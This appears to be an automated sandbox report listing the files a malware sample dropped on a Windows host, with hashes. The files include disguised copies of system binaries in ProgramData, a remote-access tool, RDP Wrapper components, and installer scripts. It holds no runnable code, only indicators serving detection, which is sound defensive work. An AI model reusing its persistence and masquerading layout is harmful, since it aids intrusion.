  • C:\ProgramData\WindowsTask\MicrosoftHost.exe

    MD5

    a74ad3584394b0766ada52191b245013

    SHA1

    6b25f4ba2c86541d4e2e5872a63fa1005373966b

    SHA256

    1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737

    SHA512

    5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

  • C:\ProgramData\WindowsTask\MicrosoftHost.exe

    MD5

    a74ad3584394b0766ada52191b245013

    SHA1

    6b25f4ba2c86541d4e2e5872a63fa1005373966b

    SHA256

    1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737

    SHA512

    5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

  • C:\ProgramData\WindowsTask\audiodg.exe

    MD5

    93e02d14c17fbcc122e1854a570fdc53

    SHA1

    a8d460a2651327011e0d3d8cf89c7e6ecfa83b63

    SHA256

    fc85ad0cfc03cb9b89f82a16ba72b405a6dd52438e1071bfb38ef93116f9679b

    SHA512

    7caca72160d2446029a56f032b6d982a223760501ab104c2e090f5d6bc8c772d131813e191e6d771dce58cfa75616c1c375cc1e971f548573b95ecf11dfce5de

  • C:\ProgramData\WindowsTask\audiodg.exe

    MD5

    93e02d14c17fbcc122e1854a570fdc53

    SHA1

    a8d460a2651327011e0d3d8cf89c7e6ecfa83b63

    SHA256

    fc85ad0cfc03cb9b89f82a16ba72b405a6dd52438e1071bfb38ef93116f9679b

    SHA512

    7caca72160d2446029a56f032b6d982a223760501ab104c2e090f5d6bc8c772d131813e191e6d771dce58cfa75616c1c375cc1e971f548573b95ecf11dfce5de

  • C:\ProgramData\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\ProgramData\Windows\install.vbs

    MD5

    5e36713ab310d29f2bdd1c93f2f0cad2

    SHA1

    7e768cca6bce132e4e9132e8a00a1786e6351178

    SHA256

    cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

    SHA512

    8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

  • C:\ProgramData\Windows\reg1.reg

    MD5

    0bfedf7b7c27597ca9d98914f44ccffe

    SHA1

    e4243e470e96ac4f1e22bf6dcf556605c88faaa9

    SHA256

    7e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e

    SHA512

    d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d

  • C:\ProgramData\Windows\reg2.reg

    MD5

    6a5d2192b8ad9e96a2736c8b0bdbd06e

    SHA1

    235a78495192fc33f13af3710d0fe44e86a771c9

    SHA256

    4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

    SHA512

    411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

  • C:\ProgramData\Windows\rfusclient.exe

    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe

    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe

    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rfusclient.exe

    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\vp8decoder.dll

    MD5

    88318158527985702f61d169434a4940

    SHA1

    3cc751ba256b5727eb0713aad6f554ff1e7bca57

    SHA256

    4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

    SHA512

    5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

  • C:\ProgramData\Windows\vp8encoder.dll

    MD5

    6298c0af3d1d563834a218a9cc9f54bd

    SHA1

    0185cd591e454ed072e5a5077b25c612f6849dc9

    SHA256

    81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

    SHA512

    389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

  • C:\ProgramData\Windows\winit.exe

    MD5

    aaf3eca1650e5723d5f5fb98c76bebce

    SHA1

    2fa0550949a5d775890b7728e61a35d55adb19dd

    SHA256

    946b1c407144816c750e90cdf1bf253a4718e18b180a710b0408b4944e8f7d4f

    SHA512

    1cb6c141fc80a0c1015050e83c6e9e5787d2ac0240065cc656c3f2a7bacaa27c89347b7d03f227525f3895990bd6b14abcb3a5a95fcf20cd901a5da96965dd6b

  • C:\ProgramData\Windows\winit.exe

    MD5

    aaf3eca1650e5723d5f5fb98c76bebce

    SHA1

    2fa0550949a5d775890b7728e61a35d55adb19dd

    SHA256

    946b1c407144816c750e90cdf1bf253a4718e18b180a710b0408b4944e8f7d4f

    SHA512

    1cb6c141fc80a0c1015050e83c6e9e5787d2ac0240065cc656c3f2a7bacaa27c89347b7d03f227525f3895990bd6b14abcb3a5a95fcf20cd901a5da96965dd6b

  • C:\ProgramData\install\cheat.exe

    MD5

    0d18b4773db9f11a65f0b60c6cfa37b7

    SHA1

    4d4c1fe9bf8da8fe5075892d24664e70baf7196e

    SHA256

    e3d02b5bfcab47b86a2366ef37c3c872858b2e25ad5c5a4d1a5e49c2afaee673

    SHA512

    a607cf5d9dd1c7d8571a9e53fb65255b7c698c08e4f1115650ee08c476a0a7b75627a5b8cd93d8839a750def62dee465e6b947ecf4b875eda5d5e0cb9141a02c

  • C:\ProgramData\install\sys.exe

    MD5

    bfa81a720e99d6238bc6327ab68956d9

    SHA1

    c7039fadffccb79534a1bf547a73500298a36fa0

    SHA256

    222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

    SHA512

    5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

  • C:\ProgramData\install\sys.exe

    MD5

    bfa81a720e99d6238bc6327ab68956d9

    SHA1

    c7039fadffccb79534a1bf547a73500298a36fa0

    SHA256

    222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

    SHA512

    5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

  • C:\Programdata\Install\del.bat

    MD5

    398a9ce9f398761d4fe45928111a9e18

    SHA1

    caa84e9626433fec567089a17f9bcca9f8380e62

    SHA256

    e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1

    SHA512

    45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

  • C:\Programdata\RealtekHD\taskhostw.exe

    MD5

    73ca737af2c7168e9c926a27abf7a5b1

    SHA1

    05fd828fd58a64f25682845585f6565b7ca2fdb2

    SHA256

    99dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2

    SHA512

    de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172

  • C:\Programdata\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\Programdata\Windows\install.bat

    MD5

    db76c882184e8d2bac56865c8e88f8fd

    SHA1

    fc6324751da75b665f82a3ad0dcc36bf4b91dfac

    SHA256

    e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

    SHA512

    da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

  • C:\Programdata\kz.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Programdata\lsass.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Programdata\lsass2.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Programdata\olly.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Programdata\script.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

    MD5

    0315d10142a4feba3e9f2f81bb76aa4d

    SHA1

    1443a18f34a875fe27070d6170f6076c1d36222d

    SHA256

    aab1424230ff5fbb3c2d1f807fed669149b4cf289a9279451d87ac1003f0f644

    SHA512

    a7ebf3df01eca93354a6bc3d3ae172c01ba47919a0d993a6b077ee16523fcdc77d474fa2435c786f7a6e652c9425defa9bdc6c32a18599b5c58972c9e1cb0407

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

    MD5

    c7d3998ff4faffb34978b15933bc9718

    SHA1

    752ecadefd93b8a20e50eebae6a76e211c691eb0

    SHA256

    dc6238f4a90c3e77537fd2d9b12f97bedfc6ca3758de193bfc9e0ffad62d0974

    SHA512

    7698f66ace34995608d97581aa9511ab832cbe51c667a0a5a8357a3042481fcc0978e97fb95243126398129bcec5a6cd751e1a97ba6a6dfd8ec15a4362f6d22b

  • C:\Windows\SysWOW64\drivers\conhost.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Windows\boy.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Windows\java.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\programdata\install\cheat.exe

    MD5

    0d18b4773db9f11a65f0b60c6cfa37b7

    SHA1

    4d4c1fe9bf8da8fe5075892d24664e70baf7196e

    SHA256

    e3d02b5bfcab47b86a2366ef37c3c872858b2e25ad5c5a4d1a5e49c2afaee673

    SHA512

    a607cf5d9dd1c7d8571a9e53fb65255b7c698c08e4f1115650ee08c476a0a7b75627a5b8cd93d8839a750def62dee465e6b947ecf4b875eda5d5e0cb9141a02c

  • C:\programdata\microsoft\intel\R8.exe

    MD5

    ad95d98c04a3c080df33ed75ad38870f

    SHA1

    abbb43f7b7c86d7917d4582e47245a40ca3f33c0

    SHA256

    40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

    SHA512

    964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\programdata\microsoft\temp\H.bat

    MD5

    ec45b066a80416bdb06b264b7efed90d

    SHA1

    6679ed15133f13573c1448b5b16a4d83485e8cc9

    SHA256

    cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e

    SHA512

    0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

  • C:\programdata\microsoft\temp\Temp.bat

    MD5

    9380f21201174ac1267aa944e1096955

    SHA1

    e97bd59509694d057daaf698a933092f804fe2e3

    SHA256

    ccf47d036ccfe0c8d0fe2854d14ca21d99be5fa11d0fbb16edcc1d6c10de3512

    SHA512

    ff4d2172c75a90b1af183fddc483d7a6d908593cb47009f37818066dee021bf7172b8890502fb26d248d39479c6276dce120b570e31f43fcc616db4b43c67e27

  • C:\rdp\RDPWInst.exe

    MD5

    3288c284561055044c489567fd630ac2

    SHA1

    11ffeabbe42159e1365aa82463d8690c845ce7b7

    SHA256

    ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

    SHA512

    c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

  • C:\rdp\RDPWInst.exe

    MD5

    3288c284561055044c489567fd630ac2

    SHA1

    11ffeabbe42159e1365aa82463d8690c845ce7b7

    SHA256

    ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

    SHA512

    c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

  • C:\rdp\RDPWInst.exe

    MD5

    3288c284561055044c489567fd630ac2

    SHA1

    11ffeabbe42159e1365aa82463d8690c845ce7b7

    SHA256

    ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

    SHA512

    c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

  • C:\rdp\Rar.exe

    MD5

    2e86a9862257a0cf723ceef3868a1a12

    SHA1

    a4324281823f0800132bf13f5ad3860e6b5532c6

    SHA256

    2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

    SHA512

    3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

  • C:\rdp\Rar.exe

    MD5

    2e86a9862257a0cf723ceef3868a1a12

    SHA1

    a4324281823f0800132bf13f5ad3860e6b5532c6

    SHA256

    2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

    SHA512

    3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

  • C:\rdp\bat.bat

    MD5

    5835a14baab4ddde3da1a605b6d1837a

    SHA1

    94b73f97d5562816a4b4ad3041859c3cfcc326ea

    SHA256

    238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92

    SHA512

    d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

  • C:\rdp\db.rar

    MD5

    462f221d1e2f31d564134388ce244753

    SHA1

    6b65372f40da0ca9cd1c032a191db067d40ff2e3

    SHA256

    534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432

    SHA512

    5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086

  • C:\rdp\install.vbs

    MD5

    6d12ca172cdff9bcf34bab327dd2ab0d

    SHA1

    d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493

    SHA256

    f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec

    SHA512

    b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

  • C:\rdp\pause.bat

    MD5

    a47b870196f7f1864ef7aa5779c54042

    SHA1

    dcb71b3e543cbd130a9ec47d4f847899d929b3d2

    SHA256

    46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba

    SHA512

    b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

  • C:\rdp\run.vbs

    MD5

    6a5f5a48072a1adae96d2bd88848dcff

    SHA1

    b381fa864db6c521cbf1133a68acf1db4baa7005

    SHA256

    c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe

    SHA512

    d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

  • \??\PIPE\lsarpc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\c:\program files\rdp wrapper\rdpwrap.dll

    MD5

    461ade40b800ae80a40985594e1ac236

    SHA1

    b3892eef846c044a2b0785d54a432b3e93a968c8

    SHA256

    798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

    SHA512

    421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

  • \??\c:\program files\rdp wrapper\rdpwrap.ini

    MD5

    dddd741ab677bdac8dcd4fa0dda05da2

    SHA1

    69d328c70046029a1866fd440c3e4a63563200f9

    SHA256

    7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

    SHA512

    6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

  • \??\c:\windows\svchost.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \Program Files\RDP Wrapper\rdpwrap.dll

    MD5

    461ade40b800ae80a40985594e1ac236

    SHA1

    b3892eef846c044a2b0785d54a432b3e93a968c8

    SHA256

    798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

    SHA512

    421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

  • \Users\Admin\AppData\Local\Temp\CE87CE80\mozglue.dll

    MD5

    9e682f1eb98a9d41468fc3e50f907635

    SHA1

    85e0ceca36f657ddf6547aa0744f0855a27527ee

    SHA256

    830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d

    SHA512

    230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed

  • \Users\Admin\AppData\Local\Temp\CE87CE80\msvcp140.dll

    MD5

    109f0f02fd37c84bfc7508d4227d7ed5

    SHA1

    ef7420141bb15ac334d3964082361a460bfdb975

    SHA256

    334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

    SHA512

    46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

  • \Users\Admin\AppData\Local\Temp\CE87CE80\nss3.dll

    MD5

    556ea09421a0f74d31c4c0a89a70dc23

    SHA1

    f739ba9b548ee64b13eb434a3130406d23f836e3

    SHA256

    f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb

    SHA512

    2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2

  • \Users\Admin\AppData\Local\Temp\CE87CE80\vcruntime140.dll

    MD5

    7587bf9cb4147022cd5681b015183046

    SHA1

    f2106306a8f6f0da5afb7fc765cfa0757ad5a628

    SHA256

    c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

    SHA512

    0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

  • memory/200-375-0x0000000000000000-mapping.dmp

  • memory/352-455-0x0000000000000000-mapping.dmp

  • memory/400-627-0x0000000000000000-mapping.dmp

  • memory/496-625-0x0000000000000000-mapping.dmp

  • memory/508-770-0x0000000000000000-mapping.dmp

  • memory/556-594-0x0000000000000000-mapping.dmp

  • memory/556-658-0x0000000000000000-mapping.dmp

  • memory/556-412-0x0000000000000000-mapping.dmp

  • memory/640-428-0x0000000000000000-mapping.dmp

  • memory/648-745-0x0000000000000000-mapping.dmp

  • memory/724-463-0x0000000000000000-mapping.dmp

  • memory/728-394-0x0000000000000000-mapping.dmp

  • memory/728-402-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

  • memory/728-404-0x00000000035F0000-0x00000000035F1000-memory.dmp

  • memory/748-954-0x0000000000000000-mapping.dmp

  • memory/812-888-0x0000000000000000-mapping.dmp

  • memory/940-553-0x0000000000000000-mapping.dmp

  • memory/968-570-0x0000000000000000-mapping.dmp

  • memory/976-408-0x0000000000000000-mapping.dmp

  • memory/988-405-0x0000000000000000-mapping.dmp

  • memory/992-547-0x0000000000000000-mapping.dmp

  • memory/1040-959-0x0000000000000000-mapping.dmp

  • memory/1124-569-0x0000000000000000-mapping.dmp

  • memory/1132-944-0x0000000000000000-mapping.dmp

  • memory/1140-371-0x0000000000000000-mapping.dmp

  • memory/1144-406-0x0000000000000000-mapping.dmp

  • memory/1220-840-0x0000000000000000-mapping.dmp

  • memory/1268-909-0x0000000000000000-mapping.dmp

  • memory/1308-674-0x0000000000000000-mapping.dmp

  • memory/1360-532-0x0000000000000000-mapping.dmp

  • memory/1384-572-0x0000000000000000-mapping.dmp

  • memory/1420-616-0x0000000000000000-mapping.dmp

  • memory/1444-679-0x0000000000000000-mapping.dmp

  • memory/1456-869-0x0000000000000000-mapping.dmp

  • memory/1520-719-0x0000000000000000-mapping.dmp

  • memory/1524-543-0x0000000000000000-mapping.dmp

  • memory/1560-652-0x0000000000000000-mapping.dmp

  • memory/1564-352-0x0000000000000000-mapping.dmp

  • memory/1640-942-0x0000000000000000-mapping.dmp

  • memory/1716-845-0x0000000000000000-mapping.dmp

  • memory/1736-747-0x0000000000000000-mapping.dmp

  • memory/1784-890-0x0000000000000000-mapping.dmp

